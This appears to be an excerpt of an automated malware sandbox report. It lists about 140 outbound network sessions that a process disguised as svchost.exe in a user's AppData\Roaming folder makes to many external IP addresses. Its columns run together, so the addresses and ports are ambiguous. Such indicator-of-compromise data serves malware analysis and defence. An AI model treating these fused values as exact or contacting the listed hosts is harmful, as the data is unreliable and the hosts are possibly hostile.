                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4258192.168.2.563197160.16.90.35312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4259192.168.2.56328143.157.51.4344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4260192.168.2.563218147.75.92.251940156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4261192.168.2.562772185.189.199.752350056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4262192.168.2.563183178.54.21.203808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4263192.168.2.563220211.222.252.187819756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4264192.168.2.563209146.59.147.116280156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4265192.168.2.563191114.132.202.78808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4266192.168.2.56317549.228.131.169500056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4267192.168.2.56324743.163.192.31567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4268192.168.2.563257184.170.249.65414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4269192.168.2.563253177.234.244.1743221356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4270192.168.2.563213185.219.133.106312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4271192.168.2.56325051.20.50.149312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4272192.168.2.56282552.151.210.204900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4273192.168.2.563252111.90.150.109108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4274192.168.2.563261173.249.29.243912356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4275192.168.2.56321760.12.168.114900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4276192.168.2.56324489.218.8.152108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4277192.168.2.563254103.83.232.1228056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4278192.168.2.56278931.200.242.2011575556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4279192.168.2.563285203.32.120.2028056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4280192.168.2.562787193.239.56.84808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4281192.168.2.563300104.16.105.1468056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4282192.168.2.563315188.114.99.378056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4283192.168.2.56286423.225.72.125350356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4284192.168.2.562820138.36.199.14415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4285192.168.2.562842194.182.187.78312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4286192.168.2.563330104.25.135.1708056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4287192.168.2.563278185.81.153.162338956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4288192.168.2.563273113.208.119.142900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4289192.168.2.56330951.158.98.1971637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4290192.168.2.563299187.122.105.181415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4291192.168.2.563361104.21.124.1218056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4292192.168.2.563346209.97.150.167312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4293192.168.2.563317190.103.177.1318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4294192.168.2.56330749.4.48.128888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4295192.168.2.56332394.45.74.60808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4296192.168.2.56329465.1.244.2328056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4297192.168.2.563383104.27.15.1618056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4298192.168.2.563325185.49.30.5808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4299192.168.2.56332462.33.207.202312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4300192.168.2.563321122.114.232.13780856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4301192.168.2.563384184.170.249.65414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4302192.168.2.563152198.8.84.3414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4303192.168.2.56338952.151.210.204900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4304192.168.2.563347103.190.54.141808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4305192.168.2.56336245.117.179.1793594256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4306192.168.2.56337139.108.227.1088056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4307192.168.2.56338843.163.192.31567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4308192.168.2.561530187.216.144.170567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4309192.168.2.563386150.109.243.1561567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4310192.168.2.563387211.222.252.187819756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4311192.168.2.562957212.110.188.2133441156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4312192.168.2.562989187.95.82.175362956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4313192.168.2.56340420.210.113.32812356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4314192.168.2.563020103.76.180.108312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4315192.168.2.56304451.15.254.1291637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4316192.168.2.563045194.145.209.187312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4317192.168.2.563089159.223.71.715909856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4318192.168.2.56341389.218.8.152108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4319192.168.2.561756142.4.7.203978256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4320192.168.2.562759107.181.168.145414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4321192.168.2.56342720.206.106.192812356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4322192.168.2.563473104.19.233.1178056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4323192.168.2.563454184.170.249.65414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4324192.168.2.563432185.81.153.162338956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4325192.168.2.563201167.179.45.56415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4326192.168.2.56313454.36.122.161718856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4327192.168.2.563151213.136.78.2004092756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4328192.168.2.563242162.144.36.2083824256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4329192.168.2.563417124.163.236.54730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4330192.168.2.563177189.240.60.164909056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4331192.168.2.561719168.138.231.177312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4332192.168.2.561762179.43.10.0808556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4333192.168.2.56298772.210.252.137414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4334192.168.2.563439116.199.168.1414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4335192.168.2.562991117.160.250.1638056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4336192.168.2.563479213.202.230.2418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4337192.168.2.563467138.36.150.15108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4338192.168.2.563486136.243.82.121108256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4339192.168.2.563483185.49.30.5808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4340192.168.2.563492107.181.148.227608756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4341192.168.2.563490118.218.126.54940056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4342192.168.2.563484128.199.221.911753256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4343192.168.2.563471139.59.1.14808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4344192.168.2.56350745.43.81.164581156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4345192.168.2.563502211.222.252.187819756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4346192.168.2.563530172.67.209.128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4347192.168.2.563489103.83.232.1228056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4348192.168.2.563511203.74.125.18888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4349192.168.2.563510150.109.243.1561567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4350192.168.2.563246115.127.2.230567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4351192.168.2.563518203.218.172.225808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4352192.168.2.56351582.157.194.44789056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4353192.168.2.563528177.234.244.1743221356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4354192.168.2.563565104.19.120.848056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4355192.168.2.5635258.217.143.1871567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4356192.168.2.561912128.199.221.91717656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4357192.168.2.563582172.67.182.778056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4358192.168.2.56328082.113.157.1223128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4359192.168.2.563535156.67.217.1598056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4360192.168.2.563524103.190.54.141808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4361192.168.2.562637162.214.102.1956089156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4362192.168.2.563604104.25.194.1758056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4363192.168.2.563458117.160.250.163808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4364192.168.2.56355451.15.210.791637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4365192.168.2.56328793.90.212.2415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4366192.168.2.56357751.210.223.9300056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4367192.168.2.563592184.170.249.65414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4368192.168.2.56203912.186.205.1218056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4369192.168.2.561980198.12.255.1932876356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4370192.168.2.56357645.117.179.1791782756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4371192.168.2.56356347.106.112.207808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4372192.168.2.561941203.76.121.237414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4373192.168.2.562012185.217.136.67133756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4374192.168.2.563564183.215.23.242909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4375192.168.2.563342161.97.163.524572556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4376192.168.2.56362623.152.40.14312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4377192.168.2.56361692.204.135.2032921256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4378192.168.2.563595139.129.162.65312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4379192.168.2.563493117.160.250.1338056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4380192.168.2.563593187.40.1.12212856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4381192.168.2.563668172.67.231.38056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4382192.168.2.563613185.81.153.162338956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4383192.168.2.56368345.14.174.1488056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4384192.168.2.56362839.108.229.14800256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4385192.168.2.56364047.56.110.204898956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4386192.168.2.563636120.77.148.138808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4387192.168.2.56361589.218.8.152108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4388192.168.2.562126162.214.102.1955036656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4389192.168.2.562720162.240.10.355046356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4390192.168.2.563399190.115.7.141198256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4391192.168.2.563689104.16.230.1638056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4392192.168.2.563660158.255.215.501699356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4393192.168.2.563643185.49.30.5808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4394192.168.2.563700104.16.105.2078056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4395192.168.2.563650138.36.150.15108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4396192.168.2.563681167.172.86.461047156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4397192.168.2.562075181.115.200.59312856176C:\Users\user\AppData\Roaming\svchost.exe
